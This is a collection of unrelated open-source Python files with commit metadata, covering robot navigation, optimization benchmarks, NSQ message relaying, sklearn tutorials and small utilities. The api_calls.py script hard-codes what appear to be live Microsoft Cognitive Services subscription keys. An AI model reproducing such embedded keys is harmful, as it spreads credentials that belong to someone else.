    throwaway local), ``Turn`` referenced the undefined name ``Time90``, and
    ``GoForward`` passed float bounds to ``xrange`` and computed an unused
    ``slope`` that could divide by zero.
    """

    def __init__(self, robot, length, height, speed=0.5, scale=0.5,
                 lookX=0, lookY=1):
        """Create a length x height grid for `robot`; (lookX, lookY) is the
        initial look-at direction and `scale` the cell size in seconds of travel."""
        # Occupancy grid: Plot[row][col] becomes 1 once the robot visits it.
        self.Plot = [[0 for _ in range(length)] for _ in range(height)]
        self.Speed = speed
        self.Robot = robot
        self.Scale = scale
        self.MidpointX = 0
        self.MidpointY = 0
        self.X = self.MidpointX
        self.Y = self.MidpointY
        self.TowardsX = lookX
        self.TowardsY = lookY

    def Start(self, x, y):
        """Anchor the grid midpoint at (x, y) and place the robot there."""
        self.MidpointX = x
        self.MidpointY = y
        self.X = self.MidpointX
        self.Y = self.MidpointY

    def Turn(self, degrees, left):
        """Rotate in place by `degrees`; left == 1 turns left, anything else right."""
        time90 = 3 * abs(self.Speed)   # seconds for a 90-degree turn at this speed
        # Fixed NameError: original read the undefined `Time90` here.
        # NOTE(review): this scaling shrinks the time as the angle grows --
        # preserved from the original; verify against the hardware.
        time = time90 / abs(degrees)
        if left == 1:
            self.Robot.turnLeft(time, abs(self.Speed))
        else:
            self.Robot.turnRight(time, abs(self.Speed))
        # Rotate the look-at vector. NOTE(review): the original used degrees
        # (not radians) and a non-standard rotation; kept as written pending
        # confirmation of the intended math.
        self.TowardsX = self.TowardsX * cos(degrees) + self.TowardsY * sin(degrees)
        self.TowardsY = self.TowardsX * -sin(degrees) + self.TowardsY * sin(degrees)

    def GoForward(self, duration):
        """Drive straight for `duration` seconds and mark the traversed cells."""
        self.TowardsX += duration
        self.TowardsY += duration
        self.Robot.motors(self.Speed, self.Speed)
        wait(duration)
        # Number of whole grid cells covered by this move.
        steps = int(duration / self.Scale)
        for x in range(self.X, steps):
            for y in range(self.Y, steps):
                if self.Plot[x][y] == 0:
                    self.Plot[x][y] = 1
        self.X += steps
        self.Y += steps
| mit | Python | |
5579100489031b941617a93baef398212db23d6e | Update openerp | sysadminmatmoz/gantt_improvement,maljac/gantt_improvement,sysadminmatmoz/gantt_improvement,maljac/gantt_improvement,maljac/gantt_improvement,stephane-/gantt_improvement,maljac/gantt_improvement,sysadminmatmoz/gantt_improvement,stephane-/gantt_improvement,stephane-/gantt_improvement,stephane-/gantt_improvement,sysadminmatmoz/gantt_improvement | __openerp__.py | __openerp__.py | {
'name': "Gantt Improvement",
'author' : 'Stéphane Codazzi @ TeMPO-Consulting',
'category': 'Project',
'sequence': 1,
'description': """
Gantt Improvement
=================
""",
'version': '0.3',
'depends': ['web', 'web_gantt'],
'js': [
'static/src/js/gantt.js',
'static/dhtmlxGantt/sources/dhtmlxgantt.js',
],
'css': [
'static/src/css/gantt.css',
'static/dhtmlxGantt/dhtmlxgantt.css',
],
'qweb': ['static/src/xml/gantt.xml'],
'data': [
#'views/web_gantt.xml', #Odoo V8.0
],
}
| {
'name': "Gantt Improvement",
'author' : 'Stéphane Codazzi @ TeMPO-consulting',
'category': 'Project',
'sequence': 1,
'description': """
Gantt Improvement
=================
""",
'version': '0.3',
'depends': ['web', 'web_gantt'],
'js': [
'static/src/js/gantt.js',
'static/dhtmlxGantt/sources/dhtmlxgantt.js',
],
'css': [
'static/src/css/gantt.css',
'static/dhtmlxGantt/dhtmlxgantt.css',
],
'qweb': ['static/src/xml/gantt.xml'],
'data': [
#'views/web_gantt.xml', #Odoo V8.0
],
}
| mit | Python |
718c31a54ce1637ef1ce9d2969a055f621c6dc7f | add MPPT benchmark | Kenneth-T-Moore/CADRE,OpenMDAO/CADRE | src/CADRE/benchmark/benchmark_mppt.py | src/CADRE/benchmark/benchmark_mppt.py | """ Optimization of the CADRE MDP."""
import os
import pickle
import numpy as np
from openmdao.components.indep_var_comp import IndepVarComp
from openmdao.core.component import Component
from openmdao.core.group import Group
from openmdao.core.problem import Problem
from openmdao.core.parallel_group import ParallelGroup
from openmdao.drivers.pyoptsparse_driver import pyOptSparseDriver
try:
from openmdao.core.petsc_impl import PetscImpl as impl
except ImportError:
impl = None
from openmdao.core.mpi_wrap import MPI
from openmdao.test.mpi_util import MPITestCase
if MPI:
from openmdao.core.petsc_impl import PetscImpl as impl
else:
from openmdao.core.basic_impl import BasicImpl as impl
import CADRE
from CADRE.power import Power_SolarPower, Power_CellVoltage
from CADRE.parameters import BsplineParameters
class Perf(Component):
    """Objective component: result = -(sum of both satellites' solar power),
    so minimizing `result` maximizes total harvested power."""
    def __init__(self, n):
        super(Perf, self).__init__()
        self.add_param('P_sol1', np.zeros((n, )), units="W",
                       desc="Solar panels power over time")
        self.add_param('P_sol2', np.zeros((n, )), units="W",
                       desc="Solar panels power over time")
        self.add_output("result", 0.0)
        # Constant Jacobian: d(result)/d(P_sol*) = -1 at every time point.
        self.J = -np.ones((1, n))
    def solve_nonlinear(self, p, u, r):
        u['result'] = -np.sum(p['P_sol1']) -np.sum(p['P_sol2'])
    def linearize(self, p, u, r):
        return {("result", "P_sol1"): self.J,
                ("result", "P_sol2"): self.J}
class MPPT(Group):
def __init__(self, LOS, temp, area, m, n):
super(MPPT, self).__init__()
params = (
("LOS", LOS, {"units": "unitless"}),
("temperature", temp, {"units": "degK"}),
("exposedArea", area, {"units": "m**2"}),
("CP_Isetpt", np.zeros((12, m)), {"units": "A"})
)
self.add("param", IndepVarComp(params))
self.add("bspline", BsplineParameters(n, m))
self.add("voltage", Power_CellVoltage(n))
self.add("power", Power_SolarPower(n))
#self.add("perf", Perf(n))
self.connect("param.LOS", "voltage.LOS")
self.connect("param.temperature", "voltage.temperature")
self.connect("param.exposedArea", "voltage.exposedArea")
self.connect("param.CP_Isetpt", "bspline.CP_Isetpt")
self.connect("bspline.Isetpt", "voltage.Isetpt")
self.connect("bspline.Isetpt", "power.Isetpt")
self.connect("voltage.V_sol", "power.V_sol")
#self.connect("power.P_sol", "perf.P_sol")
class MPPT_MDP(Group):
def __init__(self):
super(MPPT_MDP, self).__init__()
n = 1500
m = 300
cadre_path = os.path.dirname(os.path.realpath(CADRE.__file__))
data = pickle.load(open(cadre_path + "/test/data1346.pkl", 'rb'))
# CADRE instances go into a Parallel Group
para = self.add('parallel', ParallelGroup(), promotes=['*'])
para.add("pt0", MPPT(data['0:LOS'],
data['0:temperature'],
data['0:exposedArea'],
m, n))
para.add("pt1", MPPT(data['1:LOS'],
data['1:temperature'],
data['1:exposedArea'],
m, n))
self.add("perf", Perf(1500))
self.connect("pt0.power.P_sol", "perf.P_sol1")
self.connect("pt1.power.P_sol", "perf.P_sol2")
class BenchmarkMPPT(MPITestCase):
def benchmark_mppt(self):
self.model = Problem(impl=impl)
self.model.root = MPPT_MDP()
# add SNOPT driver
self.model.driver = pyOptSparseDriver()
self.model.driver.options['optimizer'] = "SNOPT"
self.model.driver.opt_settings = {
'Major optimality tolerance': 1e-3,
'Major feasibility tolerance': 1.0e-5,
'Iterations limit': 500000000,
'New basis file': 10
}
self.model.driver.add_objective("perf.result")
self.model.driver.add_desvar("pt0.param.CP_Isetpt", lower=0., upper=0.4)
self.model.driver.add_desvar("pt1.param.CP_Isetpt", lower=0., upper=0.4)
self.model.setup(check=False)
self.model.run()
| apache-2.0 | Python | |
64184fa97e9bc55dc50ed492b0b03896a7f5328d | Add degree_size | jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools | problem/pop_map/grid/degree_size.py | problem/pop_map/grid/degree_size.py | #! /usr/bin/env python
# Copyright 2020 John Hanley.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# The software is provided "AS IS", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or
# other liability, whether in an action of contract, tort or otherwise,
# arising from, out of or in connection with the software or the use or
# other dealings in the software.
from geopy.distance import distance
import geopy
def main():
    """Print the lat/lng extent of one 64-mile grid cell centered on STL."""
    # https://en.wikipedia.org/wiki/St._Louis_Lambert_International_Airport
    origin = geopy.Point(38.747222, -90.361389)
    cell = distance(miles=64)
    print(origin.format_decimal())
    # Project one grid cell due north and due east of the origin, then
    # report the latitude and longitude step sizes those hops represent.
    north_point = cell.destination(origin, bearing=0)
    east_point = cell.destination(origin, bearing=90)
    print(north_point.latitude - origin.latitude)
    print(east_point.longitude - origin.longitude)
if __name__ == '__main__':
main()
| mit | Python | |
b861ce4ca77f66eca61363855003aa508b0d6421 | add api call script | aliceranzhou/geovibes,aliceranzhou/geovibes,aliceranzhou/geovibes | scripts/api_calls.py | scripts/api_calls.py | # -*- coding: utf-8 -*-
import requests
import json
from collections import namedtuple
'''
NEWS
====
value: [
{
name: string
url: string
image: { thumbnail:
{ contentUrl: string
width: int
height: int
}
}
description: string
about: [ { readLink: string
name: string
}
]
mentions: [{ name: string }]
provider: [ {_type: string, name: string} ]
datePublished: date %Y-%m%dT%hh:mm:ss
category: string
}
]
SAMPLE:
{"name": "Snap Is Using Vending Machines for Its New Camera Glasses",
"url": "http:\/\/www.bing.com\/cr?IG=EFB171B8ABC94328B7EE4689A0BB20D9&CID=3F96AB4DDC906F9A3574A286DDA16EAF&rd=1&h=acQNdE7k_qK5fn0QyKfaDgISEoU4tCoAUSGF_bG8KrA&v=1&r=http%3a%2f%2fwww.nbcnews.com%2ftech%2ftech-news%2fsnap-using-vending-machines-its-new-camera-glasses-n682696&p=DevEx,5210.1",
"image": {"thumbnail": {"contentUrl": "https:\/\/www.bing.com\/th?id=ON.01B69C301515AEFBF1DD7823834D5DEE&pid=News", "width": 320, "height": 210}},
"description": "What do a sandwich, soda and Spectacles have in common? You can buy all three from vending machines. Spectacles - the camera glasses from the company formerly known as Snapchat — went up for sale in a bright yellow vending machine on Thursday.",
"about": [{"readLink": "https:\/\/api.cognitive.microsoft.com\/api\/v5\/entities\/90fd2ef2-8123-de59-2b1f-ccd033454a4a", "name": "NBC News"}, {"readLink": "https:\/\/api.cognitive.microsoft.com\/api\/v5\/entities\/3df07628-b8da-2cb7-7d61-95c268a5d178", "name": "Camera"}, {"readLink": "https:\/\/api.cognitive.microsoft.com\/api\/v5\/entities\/97410ae3-4d3a-cf91-43d0-2ad5986953e4", "name": "Vending machine"}],
"mentions": [{"name": "NBC News"}, {"name": "Camera"}, {"name": "Vending machine"}],
"provider": [{"_type": "Organization", "name": "NBC News"}],
"datePublished": "2016-11-12T12:42:00",
"category": "Products"},
SENTIMENT
=========
{
"documents": [
{
"score": 0.0,
"id": "string"
}
]
}
SAMPLE:
{"documents":[{"score":0.9572602,"id":"1"}],"errors":[]}
KEY PHRASES:
[{u'keyPhrases': [u'Spectacles', u'bright yellow vending machine', u'sale', u'soda', u'Los Angeles', u'camera glasses', u'company', u'Thursday', u'vending machines', u'sandwich'], u'id': u'1'}]
'''
#headers = {'Ocp-Apim-Subscription-Key':'782e68122d8742c091f6dee73fc2d270'}
#
#r = requests.get('https://api.cognitive.microsoft.com/bing/v5.0/news/', headers=headers)
#print r.content
#
# Request headers for the Text Analytics v2.0 key-phrase endpoint.
# NOTE(review): the subscription key is hard-coded and committed; it should
# be read from the environment or a config file instead.
headers = {'Ocp-Apim-Subscription-Key':'7b20e9c1ffa8470cab2e3b6245148cf6',
           'Content-Type': 'application/json',
           'Accept': 'application/json'
           }
# Single-document batch payload in the shape the API expects.
payload = {
    "documents": [
        {
            "language": "en",
            "id": "1",
            "text": "What do a sandwich, soda and Spectacles have in common? Los Angeles You can buy all three from vending machines. Spectacles - the camera glasses from the company Okalitsa Balatniki formerly known as Snapchat — went up for sale in a bright yellow vending machine on Thursday"
        }
    ]
}
# POST the batch and print the extracted key phrases.
# (Python 2 print statement — this script is Python 2 only.)
r = requests.post('https://westus.api.cognitive.microsoft.com/text/analytics/v2.0/keyPhrases', json = payload, headers=headers)
print r.json()['documents']
| mit | Python | |
aa1fbbaca3e26904855a33014c5077867df54342 | Add Vetinari example | quasipedia/swaggery,quasipedia/swaggery | examples/vetinari/vetinari.py | examples/vetinari/vetinari.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
'''A Lord Vetinari clock API.'''
from time import strftime, localtime, time
from random import randint
from uwsgi import async_sleep as sleep
from swaggery.keywords import *
class TickStream(Model):

    '''A stream of clock ticks.'''

    # Swagger/JSON schema for the model: an array of timestamp strings.
    schema = {
        'type': 'array',
        'items': {'type': 'string'}
    }
class LordVetinari(Api):

    '''The API of Lord Vetinari.'''

    # Swaggery API metadata: version string and URL mount path.
    version = '1.0.0'
    path = 'vetinari'
class Clock(Resource):

    '''The world-famous irregular and yet accurate clock.'''

    api = LordVetinari
    # Both parameters are extracted from the URL path.
    subpath = 'ticks/<length>/<style>'
    # strftime formats for the two supported tick styles.
    _styles = {'compact': '%H:%M:%S', 'extended': '%a, %d %b %Y %H:%M:%S'}

    @operations('GET')
    def ticks(
            cls, request,
            length: (Ptypes.path, Integer('Duration of the stream, in seconds.')),
            style: (Ptypes.path, String('Tick style.', enum=['compact', 'extended']))
            ) -> [
                (200, 'Ok', TickStream),
                (400, 'Invalid parameters')
            ]:
        '''A streaming Lord Vetinari clock...'''
        # Validate the raw path parameters; anything unparsable is a 400.
        try:
            length = int(length)
            style = cls._styles[style]
        except (ValueError, KeyError):
            Respond(400)

        def venturi_clock():
            # Generator: yield the current time at irregular intervals
            # (0.25-4.0 s) until `length` seconds have elapsed.
            start = time()
            while time() - start <= length:
                sleep(randint(25, 400) / 100)
                yield strftime(style, localtime())

        Respond(200, venturi_clock())
| agpl-3.0 | Python | |
eb8f749b2094d61737af496fb6e6c90bad423761 | add disk_usage.py example script | tamentis/psutil,tamentis/psutil | examples/disk_usage.py | examples/disk_usage.py | #!/usr/bin/env python
"""
List all mounted disk partitions a-la "df" command.
"""
import sys
import psutil
def convert_bytes(n):
    """Return *n* bytes as a human-readable string, e.g. 2048 -> '2.0k'.

    Uses binary (1024-based) prefixes. Values below 1 kiB are returned as a
    plain byte count ('<n>B'); the original implementation silently returned
    None for 0 < n < 1024, which printed as 'None' in the table.
    """
    symbols = ('k', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')
    # Walk the prefixes from largest to smallest and use the first that fits.
    for i, s in reversed(list(enumerate(symbols))):
        unit = 1 << (i + 1) * 10
        if n >= unit:
            return '%.1f%s' % (float(n) / unit, s)
    # n < 1024 (including 0): report raw bytes.
    return '%dB' % n
def main():
    """List every mounted partition with df-style usage columns (Python 2)."""
    print "Device Total Used Free Use % Type Mount"
    # disk_partitions(0) includes all partitions, not just physical devices.
    for part in psutil.disk_partitions(0):
        usage = psutil.disk_usage(part.mountpoint)
        print "%-9s %8s %8s %8s %5s%% %8s %s" % (part.device,
                                                 convert_bytes(usage.total),
                                                 convert_bytes(usage.used),
                                                 convert_bytes(usage.free),
                                                 int(usage.percent),
                                                 part.fstype,
                                                 part.mountpoint)
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | Python | |
5721ec07b9a40d2f8f5e04bd2c37c1e015fb99df | add an example client, nsq_to_nsq.py | protoss-player/pynsq,svmehta/pynsq,bitly/pynsq,pombredanne/pynsq,bitly/pynsq,elubow/pynsq,nsqio/pynsq,mreiferson/pynsq,protoss-player/pynsq,goller/pynsq,virtuald/pynsq,jonmorehouse/pynsq,virtuald/pynsq,mreiferson/pynsq,jehiah/pynsq,jonmorehouse/pynsq | examples/nsq_to_nsq.py | examples/nsq_to_nsq.py | # nsq_to_nsq.py
# Written by Ryder Moody and Jehiah Czebotar.
# Slower than the golang nsq_to_nsq included with nsqd, but useful as a
# starting point for a message transforming client written in python.
import tornado.options
from nsq import Reader, run
from nsq import Writer, Error
import functools
import logging
from host_pool import HostPool
class NSQProxy:
    """Relay NSQ messages to a destination topic via a pool of writers."""

    def __init__(self, topic, nsqds):
        # topic: destination topic name. nsqds: list of nsqd TCP addresses;
        # each gets its own Writer, load-balanced through a HostPool.
        self.topic = topic
        self.writer_pool = HostPool([Writer([nsqd]) for nsqd in nsqds])

    def relay(self, nsq_message):
        """Republish one message; FIN/REQ is deferred to the pub callback."""
        # Async mode stops the reader from auto-finishing the message.
        nsq_message.enable_async()
        writer = self.writer_pool.get()
        callback = functools.partial(self._on_message_response, nsq_message=nsq_message, writer=writer)
        writer.pub(self.topic, nsq_message.body, callback)

    def _on_message_response(self, conn, data, nsq_message, writer):
        # Pub failed: mark the writer unhealthy and requeue the message.
        # Otherwise record the success and finish (ack) the message.
        if isinstance(data, Error):
            logging.warning("requeuing message: %s", nsq_message.body)
            self.writer_pool.failed(writer)
            nsq_message.requeue()
        else:
            self.writer_pool.success(writer)
            nsq_message.finish()
if __name__ == "__main__":
    # Command-line flags (tornado.options doubles as the config parser).
    tornado.options.define('destination_topic', type=str)
    tornado.options.define('topic', type=str)
    tornado.options.define('nsqd_tcp_address', type=str, multiple=True)
    tornado.options.define('destination_nsqd_tcp_address', type=str, multiple=True)
    tornado.options.define('lookupd_http_address', type=str, multiple=True)
    tornado.options.define('channel', type=str)
    tornado.options.define('max_in_flight', type=int, default=500)
    tornado.options.parse_command_line()

    # Required settings; destination topic defaults to the source topic.
    assert tornado.options.options.topic
    assert tornado.options.options.destination_nsqd_tcp_address
    assert tornado.options.options.channel

    destination_topic = str(tornado.options.options.destination_topic or tornado.options.options.topic)

    # lookupd endpoints are given as host:port; the client wants full URLs.
    lookupd_http_addresses = map(lambda addr: 'http://' + addr, tornado.options.options.lookupd_http_address)

    proxy = NSQProxy(destination_topic, tornado.options.options.destination_nsqd_tcp_address)

    # The Reader pushes every message through proxy.relay; run() blocks
    # on the IOLoop until interrupted.
    Reader(
        topic=tornado.options.options.topic,
        channel=tornado.options.options.channel,
        message_handler=proxy.relay,
        max_in_flight=tornado.options.options.max_in_flight,
        lookupd_http_addresses=lookupd_http_addresses,
        nsqd_tcp_addresses=tornado.options.options.nsqd_tcp_address,
    )
    run()
| mit | Python | |
39c50fe7d4713b9d0a8e4618a829d94b4fe7456c | Add code to test van der pol model | synergetics/nest_expermiments,synergetics/nest_expermiments | van_der_pol_sync.py | van_der_pol_sync.py |
from __future__ import division
import sys
import numpy as np
sys.path.append('/media/ixaxaar/Steam/src/nest/local/lib/python2.7/site-packages/')
import nest
import nest.raster_plot
import nest.voltage_trace
import uuid
import pylab
# Sub-millisecond kernel resolution for the oscillator dynamics.
nest.SetKernelStatus({"resolution": .001})

# Register the AC generator under a unique model name so repeated runs in
# the same kernel session don't collide on the model name.
u = uuid.uuid4()
nest.CopyModel('ac_generator', u, {'amplitude': 1., 'frequency': 20.})
ac = nest.Create(u)

# Build nine van der Pol oscillators, each with a random epsilon and
# matching excitatory drive current (both scaled to [0, 1)).
n = ()
for i in xrange(1,10):
    r = np.random.uniform(1000)
    print r
    n += nest.Create("relaxos_van_der_pol", 1, {"epsilon": r/1000, "input_currents_ex": r/1000})

d = nest.Create("spike_detector")
v = nest.Create('voltmeter', 1, {"withgid": True, "withtime": True})

# nest.Connect(ac, n, 'all_to_all', {'weight': .05, 'model': 'static_synapse'})
# All-to-all coupling between the oscillators; the voltmeter records all.
nest.Connect(n, n, 'all_to_all', {'weight': .1, 'model': 'static_synapse'})
nest.Connect(v, n)

# NOTE(review): Simulate is passed the string "1000" — confirm NEST accepts
# a string here; the call normally takes a number of milliseconds.
nest.Simulate("1000")

nest.voltage_trace.from_device(v)
pylab.show()
| mit | Python | |
161802f87065a6b724c8c02357edf8cbb5b38f1a | Add a rosenbrock example. | lmjohns3/downhill,rodrigob/downhill | examples/rosenbrock.py | examples/rosenbrock.py | import climate
import downhill
import matplotlib.pyplot as plt
import matplotlib.animation as anim
import mpl_toolkits.mplot3d.axes3d
import numpy as np
import theano
import theano.tensor as TT
climate.enable_default_logging()

_, ax = plt.subplots(1, 1)

# run several optimizers for comparison.
for i, (algo, label, kw) in enumerate((
        ('sgd', 'SGD - Momentum 0', {}),
        ('sgd', 'SGD - Momentum 0.5', dict(momentum=0.5, nesterov=False)),
        ('rmsprop', 'RMSProp - Momentum 0', {}),
        ('rmsprop', 'RMSProp - Momentum 0.5', dict(momentum=0.5, nesterov=False)),
        ('adam', 'Adam - Momentum 0', {}),
        #('esgd', 'ESGD - Momentum 0', {}),
        ('rprop', 'RProp - Momentum 0', {}),
        ('adadelta', 'ADADELTA - Momentum 0', {}),
        )):
    print(label)

    # Two shared parameters; the loss is the classic 2-D Rosenbrock
    # function, whose global minimum sits at (1, 1).
    x = theano.shared(np.array([-1.1, -0.4], 'f'), name='x')

    opt = downhill.build(
        algo,
        loss=(100 * (x[1:] - x[:-1] ** 2) ** 2 + (1 - x[:-1]) ** 2).sum(),
        params=[x],
        inputs=[],
        monitors=[('x', x[:-1].sum()), ('y', x[1:].sum())])

    # Record the first 100 optimization steps for plotting.
    xs, ys = [], []
    for tm, _ in opt.iteropt([[]],
                             max_gradient_clip=1,
                             min_improvement=0,
                             learning_rate=0.01,
                             patience=0,
                             **kw):
        xs.append(tm['x'])
        ys.append(tm['y'])
        if len(xs) == 100:
            break

    # Offset each trace slightly in y so overlapping paths stay visible.
    ax.plot(np.array(xs), np.array(ys) + 0.05 * i,
            'o-', label=label, alpha=0.3)

# make a contour plot of the rosenbrock function surface.
a = b = np.arange(-1.2, 1.2, 0.05)
X, Y = np.meshgrid(a, b)
Z = 100 * (Y - X ** 2) ** 2 + (1 - X) ** 2
# Mark the true minimum with an 'x'.
ax.plot([1], [1], 'x', mew=2, color='#111111')
ax.contourf(X, Y, Z, np.logspace(0, 3, 10))

plt.legend(loc='upper left')
plt.show()
| mit | Python | |
5aca812341fa16f0d31fcf6f43f1c937a81c2141 | Create supervised.py | txt/fss17,txt/fss17,txt/fss17 | examples/supervised.py | examples/supervised.py |
""" Part 1 """
# Load data
import numpy as np
from sklearn import datasets
iris = datasets.load_iris()
iris_X = iris.data
iris_y = iris.target
print(iris.feature_names)
print(iris.target_names)
print(np.unique(iris_y))
# Visualize data
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
X = iris.data[:, :2] # we only take the first two features.
y = iris.target
x_min, x_max = X[:, 0].min() - .5, X[:, 0].max() + .5
y_min, y_max = X[:, 1].min() - .5, X[:, 1].max() + .5
# Plot the training points
plt.figure(2, figsize=(8, 6))
plt.clf()
plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.Set1, edgecolor='k')
plt.xlabel('Sepal length')
plt.ylabel('Sepal width')
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
plt.xticks(())
plt.yticks(())
plt.show()
# Plot the distribution in boxplot
plt.boxplot(iris.data)
plt.xlabel('Features')
plt.ylabel('Cm')
plt.show()
""" Part 2 """
# KNN Classification
# shuffle the data
np.random.seed(0)
indices = np.random.permutation(len(iris_X))
# Split iris data in train and test data
# A random permutation, to split the data randomly
iris_X_train = iris_X[indices[:-10]]
iris_y_train = iris_y[indices[:-10]]
iris_X_test = iris_X[indices[-10:]]
iris_y_test = iris_y[indices[-10:]]
# Create and fit a nearest-neighbor classifier
from sklearn.neighbors import KNeighborsClassifier
knn = KNeighborsClassifier()
knn.fit(iris_X_train, iris_y_train)
# Do prediction on the test data
knn.predict(iris_X_test)
print iris_y_test
# KNN Visualization.
n_neighbors = 15
h = .02 # step size in the mesh
# Create color maps
from matplotlib.colors import ListedColormap
cmap_light = ListedColormap(['#FFAAAA', '#AAFFAA', '#AAAAFF'])
cmap_bold = ListedColormap(['#FF0000', '#00FF00', '#0000FF'])
for weights in ['uniform', 'distance']:
# we create an instance of Neighbours Classifier and fit the data.
knn = KNeighborsClassifier(n_neighbors, weights=weights)
knn.fit(X, y)
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, x_max]x[y_min, y_max].
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = knn.predict(np.c_[xx.ravel(), yy.ravel()])
# Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.figure()
plt.pcolormesh(xx, yy, Z, cmap=cmap_light)
# Plot also the training points
plt.scatter(X[:, 0], X[:, 1], c=y, cmap=cmap_bold,
edgecolor='k', s=20)
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.title("3-Class classification (k = %i, weights = '%s')"
% (n_neighbors, weights))
plt.show()
""" Part 3 """
from sklearn import svm
svc = svm.SVC(kernel='linear')
svc.fit(iris_X_train, iris_y_train)
svc.predict(iris_X_test)
print iris_y_test
### Your Job: get the SVC visualization for different kernels.
| bsd-3-clause | Python | |
d14130c30f776d9b10ab48c993096dce251aba28 | Add script to get list of HRS station IDs | amacd31/hydromet-toolkit,amacd31/hydromet-toolkit | get_hrs_cc_streamflow_list.py | get_hrs_cc_streamflow_list.py | import pandas as pd
from kiwis_pie import KIWIS
k = KIWIS('http://www.bom.gov.au/waterdata/services')
def get_cc_hrs_station_list(update = False):
    """
    Return list of station IDs that exist in HRS and are supplied by providers that license their data under the Creative Commons license.

    :param update: Flag to indicate if cached station information should be fetched from WISKI again (and saved to disk as CSV).
    :type update: boolean
    """
    if update:
        # Refresh the station list from the KIWIS service and cache to CSV.
        stations = k.get_timeseries_list(parametertype_name = 'Water Course Discharge', ts_name = 'DMQaQc.Merged.DailyMean.09HR')
        stations.to_csv('available_watercoursedischarge_stations.csv')
    else:
        stations = pd.read_csv('available_watercoursedischarge_stations.csv', index_col=0)

    # Restrict to stations that appear in the HRS reference list.
    # NOTE(review): DataFrame.ix is removed in modern pandas; switch to .loc
    # (or boolean indexing) when upgrading.
    hrs_stations = pd.read_csv('hrs_station_list.csv', skiprows=1)
    station_subset = stations.ix[stations.station_no.isin(hrs_stations.station_id)]

    if update:
        # Fetch per-station attributes (one request each) and cache them too.
        station_attrs = []
        for i, station in station_subset.iterrows():
            attrs = k.get_station_list(station_no = station.station_no, parametertype_name = 'Water Course Discharge', return_fields=['station_id','custom_attributes'])
            station_attrs.append(attrs.set_index('station_id'))
        station_attributes = pd.concat(station_attrs)
        station_attributes.to_csv('station_attributes.csv')
    else:
        station_attributes = pd.read_csv('station_attributes.csv', index_col=0)

    # Keep only stations whose data owner is a Creative Commons provider.
    cc_providers = pd.read_csv('cc_providers.csv', skiprows=8)
    station_list = station_attributes.ix[station_attributes.DATA_OWNER.isin(cc_providers.ProviderID.values)].index.values

    return station_list
if __name__ == "__main__":
for station in get_cc_hrs_station_list():
print(station)
| bsd-3-clause | Python | |
cbb7fd7d31bf103e0e9c7b385926b61d42dbb8ec | add __main__ file | firemark/homework-parser | homework_parser/__main__.py | homework_parser/__main__.py | from homework_parser.file_parser import detect_plugin
from sys import argv, stdin, stdout, stderr, exit
if __name__ == "__main__":
in_format = argv[1]
out_format = argv[2]
out_plugin = detect_plugin(out_format)
if out_plugin is None:
print >> stderr, ('out-plugin %s not found' % out_format)
exit(-1)
in_plugin = detect_plugin(in_format)
if in_plugin is None:
print >> stderr, ('in-plugin %s not found' % in_format)
exit(-1)
if len(argv) == 4:
with open(argv[3]) as f:
data = in_plugin.read_from_file(f)
else:
data = in_plugin.read_from_file(stdin)
out_plugin.write_to_file(stdout, data)
| mit | Python | |
de5c4e57ccedf0b5c9897bc2046b79ac19a18a0c | add solution for Remove Duplicates from Sorted List | zhyu/leetcode,zhyu/leetcode | src/removeDuplicatesFromSortedList.py | src/removeDuplicatesFromSortedList.py | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
    # @param head, a ListNode
    # @return a ListNode
    def deleteDuplicates(self, head):
        """Collapse runs of equal values in a sorted linked list, in place."""
        node = head
        while node is not None:
            # Skip past every immediately-following node with the same
            # value, splice them out, then move on to the next distinct one.
            runner = node.next
            while runner is not None and runner.val == node.val:
                runner = runner.next
            node.next = runner
            node = runner
        return head
| mit | Python | |
aec88e4f9cf2d9ee7f9fe876a7b884028b6c190c | Add Script to generate a container schema from DockerFile | webdevops/Dockerfile,webdevops/Dockerfile,webdevops/Dockerfile,webdevops/Dockerfile,webdevops/Dockerfile,webdevops/Dockerfile | bin/buildHierarchiqueDiagram.py | bin/buildHierarchiqueDiagram.py | #!/usr/bin/env/python
from datetime import datetime
import os
import argparse
import re
from graphviz import Digraph
PATH = os.path.dirname(os.path.abspath(__file__))
FROM_REGEX = re.compile(ur'^FROM\s+(?P<image>[^:]+)(:(?P<tag>.+))?', re.MULTILINE)
CONTAINERS = {}
def get_current_date():
    """Return today's date formatted as DD.MM.YYYY (used in the graph label)."""
    # Local import on purpose: the module does `from datetime import datetime`,
    # so the module-level name `datetime` is the class, not the module. The
    # original worked around that with `import datetime` and a long attribute
    # chain; importing `date` directly is the minimal, clearer fix.
    from datetime import date
    return date.today().strftime("%d.%m.%Y")
def processDockerfile(inputFile):
    """Record a Dockerfile's base image in the global CONTAINERS map."""
    # The image name is derived from the directory layout:
    # .../<image>/<tag>/Dockerfile -> "webdevops/<image>".
    outputFile = os.path.splitext(inputFile)
    outputFile = os.path.join(os.path.dirname(outputFile[0]),os.path.basename(outputFile[0]))
    dockerImage = os.path.basename(os.path.dirname(os.path.dirname(outputFile)))
    dockerTag = os.path.basename(os.path.dirname(outputFile))
    with open(inputFile, 'r') as fileInput:
        DockerfileContent = fileInput.read()
        # NOTE(review): [0] raises IndexError when a Dockerfile has no FROM
        # line — consider guarding if such files can occur.
        data = ([m.groupdict() for m in FROM_REGEX.finditer(DockerfileContent)])[0]
